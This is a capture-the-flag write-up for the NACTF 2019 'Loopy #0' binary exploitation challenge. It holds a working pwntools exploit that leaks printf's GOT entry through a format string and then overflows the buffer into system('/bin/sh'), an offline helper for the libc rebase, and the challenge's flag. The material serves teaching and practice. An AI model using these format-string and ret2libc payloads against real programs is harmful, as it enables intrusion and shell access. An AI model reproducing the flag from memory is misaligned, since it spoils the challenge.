Loopy #0

Binary Exploitation - Points: 350

This program is quite short, but has got printf and gets in it! This shouldn't be too hard, right?

Connect at nc shell.2019.nactf.com 31283

loopy-0.c

loopy-0

libc.so.6

The exploit uses a format string to leak the runtime address of printf (read out of its GOT entry) so the libc base address can be calculated. The same input also overflows the buffer so the function returns into itself, giving us a second input.

With the libc base address we can now calculate the addresses of system and the "/bin/sh" string in libc, and overflow the buffer again to return into system and spawn a shell.

Exploit script:

from pwn import *

# Offsets inside the provided libc; leaking one function's runtime address lets us rebase the rest.
libc = ELF('libc.so.6')
system_off = libc.symbols['system']
shell_off = next(libc.search(b'/bin/sh'))
printf_off = libc.symbols['printf']

e = ELF('loopy-0')
printf_got = e.got['printf']  # GOT slot that holds printf's runtime address

# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')

# Stage 1: the first 4 bytes of our buffer sit where printf looks for argument 4,
# so %4$s dereferences the GOT address and prints printf's runtime address.
# The padding then overflows the buffer and returns into vuln() for a second input.
payload = p32(printf_got) + b'%4$s' + b'A' * 68 + p32(e.symbols['vuln'])

p.sendline(payload)
p.recvuntil(b'You typed: ')
p.recv(4)                # skip the echoed GOT address bytes
leak = u32(p.recv(4))    # the 4 bytes %4$s printed: printf in libc
log.info("leak: " + hex(leak))

libc_base = leak - printf_off

system = libc_base + system_off
shell = libc_base + shell_off

log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))

# Stage 2: ret2libc. Overwrite the return address with system, a dummy return
# address, and a pointer to "/bin/sh" as system's argument.
p.sendline(b'A' * 76 + p32(system) + p32(0x0) + p32(shell))
p.interactive()
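The leak-and-rebase step above (read the echoed output, pull out the pointer that %4$s printed, subtract the symbol offset) is shown here offline as an added example, not part of the original writeup. The program output, GOT address and libc offsets below are constructed placeholders; the check that the derived base is page-aligned is the sanity test I would add before trusting any computed address.

```python
import struct

PAGE_SIZE = 0x1000

def parse_leak(output: bytes, marker: bytes = b"You typed: ", echoed: int = 4) -> int:
    """Extract the 32-bit pointer that %4$s wrote after the echoed GOT address.

    The payload begins with the GOT address itself, which the program echoes back
    before the %4$s output, so those bytes are skipped. %s stops at the first NUL,
    so a pointer whose low byte is 0x00 would arrive truncated; that is caught below.
    """
    idx = output.find(marker)
    if idx < 0:
        raise ValueError("marker not found in program output")
    data = output[idx + len(marker) + echoed:]
    if len(data) < 4:
        raise ValueError("fewer than 4 bytes after the marker; leak truncated")
    return struct.unpack("<I", data[:4])[0]

def libc_base(leak: int, symbol_offset: int) -> int:
    """Rebase: runtime address minus the symbol's offset inside libc.

    libc is mapped page-aligned, so a base with low bits set means the leak or
    the libc build does not match; refuse rather than jump to garbage.
    """
    base = leak - symbol_offset
    if base <= 0 or base % PAGE_SIZE:
        raise ValueError(f"implausible libc base {base:#x}; check the libc version")
    return base

def resolve(base: int, offsets: dict) -> dict:
    """Add the base to every offset (system, /bin/sh, ...)."""
    return {name: base + off for name, off in offsets.items()}

# Constructed sample (placeholders, not the challenge's real values): the marker,
# the echoed GOT address, the leaked runtime address of printf, then the padding.
SAMPLE_OUTPUT = (b"You typed: " + struct.pack("<I", 0x0804A010)
                 + struct.pack("<I", 0xF7E4A6D0) + b"A" * 68 + b"\n")
SAMPLE_OFFSETS = {"printf": 0x0516D0, "system": 0x03D200, "/bin/sh": 0x17E0CF}

def rebase_from_output(output: bytes = SAMPLE_OUTPUT, offsets: dict = SAMPLE_OFFSETS) -> dict:
    """Full chain on captured output: parse the leak, derive the base, resolve symbols."""
    leak = parse_leak(output)
    base = libc_base(leak, offsets["printf"])
    return {"leak": leak, "base": base, **resolve(base, offsets)}

if __name__ == "__main__":
    for name, addr in rebase_from_output().items():
        print(f"{name:>8}: {addr:#010x}")
```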

flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}